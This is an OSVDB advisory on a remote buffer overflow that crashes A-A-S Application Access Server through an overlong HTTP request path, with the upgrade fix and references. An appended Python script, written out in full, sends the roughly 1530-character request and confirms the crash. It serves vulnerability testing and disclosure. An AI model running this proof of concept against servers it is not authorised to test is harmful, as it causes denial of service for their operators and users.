Application Access Server Long HTTP Request DoS

2004-02-02T09:43:04
ID OSVDB:3801
Type osvdb
Reporter OSVDB
Modified 2004-02-02T09:43:04

Description

Vulnerability Description

A remote overflow exists in A-A-S Application Access Server. A-A-S does not bound the length of a requested file path: a request whose path exceeds roughly 1530 characters overflows a fixed-size buffer. With such a request, an unauthenticated remote attacker can crash A-A-S, resulting in a loss of availability. Because the fault is a buffer overflow, it could potentially be leveraged to execute code, although the advisory does not report that this has been demonstrated.

Technical Description

Versions prior to 1.0.38 may be affected.

Solution Description

Upgrade to version 1.0.38 or higher, which has been reported to fix this vulnerability. No workarounds are known, so an upgrade is required.

Manual Testing Notes

Confirm the server answers a normal request, then send a standard file request whose path is about 1530 characters long, for example: http://server:6262/[1530*char]. A vulnerable server stops responding (or the process exits) after the long request; re-issue a short request to verify the loss of availability rather than relying on the long request's own error.
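The manual test above as a script, added here as an example and not taken from OSVDB, the original advisory or the A-A-S vendor. It takes a baseline (short request answered), sends one request whose path is 1530 fill characters, then re-checks whether the server still answers, which is the observation that distinguishes a crash from a mere error response. Port 6262 and the 1530-character length come from the advisory; the hostname "server", the fill character "A" and the HTTP/1.0 request framing are assumptions. Since the overflow threshold is approximate, the length is a parameter so it can be swept.

```python
import socket
import sys

DEFAULT_PORT = 6262      # A-A-S port named in the advisory's testing notes
CRASH_LENGTH = 1530      # path length the advisory reports as triggering the overflow


def build_request(host, path_length, port=DEFAULT_PORT, fill="A"):
    """Return a raw HTTP/1.0 GET whose request path is `path_length` fill bytes.

    HTTP/1.0 with Connection: close keeps each probe to one connection, so a
    later availability check is not confused by keep-alive state. The fill
    character is an assumption; the advisory only says "char".
    """
    path = "/" + fill * path_length
    return (
        f"GET {path} HTTP/1.0\r\n"
        f"Host: {host}:{port}\r\n"
        f"Connection: close\r\n"
        f"\r\n"
    ).encode("ascii")


def request_path_length(raw):
    """Length of the path (excluding the leading '/') in a request from build_request."""
    request_line = raw.split(b"\r\n", 1)[0]
    return len(request_line.split(b" ")[1]) - 1


def send_probe(host, port, payload, timeout=5.0):
    """Send one raw request. Returns (connected, response_bytes_or_None)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(payload)
            try:
                return True, s.recv(4096)
            except socket.timeout:
                return True, None      # connected but no answer within the timeout
    except OSError:
        return False, None             # refused, unreachable or reset


def server_alive(host, port, timeout=3.0):
    """Benign one-character path; True if the server accepts and answers."""
    connected, response = send_probe(host, port, build_request(host, 1, port), timeout)
    return connected and response is not None


def probe_long_request(host, port=DEFAULT_PORT, length=CRASH_LENGTH):
    """Baseline check, long request, availability re-check.

    Returns a dict so the caller can see each step; the DoS is indicated by
    baseline_alive=True and after_alive=False.
    """
    result = {"baseline_alive": server_alive(host, port), "long_request_sent": False}
    if not result["baseline_alive"]:
        result["after_alive"] = False
        return result
    connected, _ = send_probe(host, port, build_request(host, length, port))
    result["long_request_sent"] = connected
    result["after_alive"] = server_alive(host, port)
    return result


if __name__ == "__main__":
    # Hostname "server" is an assumption; pass a real target as argv[1].
    target = sys.argv[1] if len(sys.argv) > 1 else "server"
    length = int(sys.argv[2]) if len(sys.argv) > 2 else CRASH_LENGTH
    outcome = probe_long_request(target, length=length)
    print(outcome)
    if outcome["baseline_alive"] and not outcome["after_alive"]:
        print(f"server stopped responding after a {length}-character path")
```

Run it as `python aas_probe.py host [length]`; stepping the length from a few hundred characters up past 1530 shows where the service stops answering, and a server that still answers afterwards either is patched (1.0.38 or later) or is not the build the advisory describes.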

References:

Vendor URL: http://www.applicationaccessserver.de/index_en.html
Secunia Advisory ID: 10762
Other Advisory URL: http://members.lycos.co.uk/r34ct/main/A-A-S/AAS1_0_3.TXT
ISS X-Force ID: 15003
CVE-2004-2169